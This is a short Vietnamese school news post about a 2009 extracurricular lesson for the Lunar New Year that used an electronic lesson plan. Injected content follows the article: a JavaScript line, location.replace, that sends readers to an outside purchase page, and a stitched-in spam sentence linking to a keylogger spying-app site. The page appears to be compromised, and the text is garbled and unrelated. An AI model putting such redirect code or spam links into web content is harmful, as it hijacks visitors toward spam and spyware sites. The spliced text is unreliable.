Sinh hoạt ngoại khóa với chủ đề:”Chào Xuân Kỷ Sửu”

12/03/2009 12:00 Sáng 3 phản hồi

Hưởng ứng năm học Ứng dung công nghệ thông tin, không chỉ các tiết  học chính khóa, các cô giáo còn mạnh dạn thiết kế giáo án điện tử trong tiết sinh hoạt ngoại khóa.  Hưởng ứng năm học Ứng dung công nghệ thông tin, không chỉ các tiết  học chính khóa, các cô giáo còn mạnh dạn thiết kế giáo án điện tử trong tiết sinh hoạt ngoại khóa.  Với hình thức tương tự như chương trình” Đuổi hình bắt chữ”, chủ đề” Chào Xuân Kỉ Sửu” các em đã có một tiết học vui tươi, sôi nổi, bổ ích và đầy hào hứng.

location.replace(“http://gethere.info/buy.php”);

} It makes use of list manipulation which may be a difficult concept for a https://topspyingapps.com/best-keylogger beginning programmer to grasp

Các phản hồi đã bị đóng lại bở quản trị.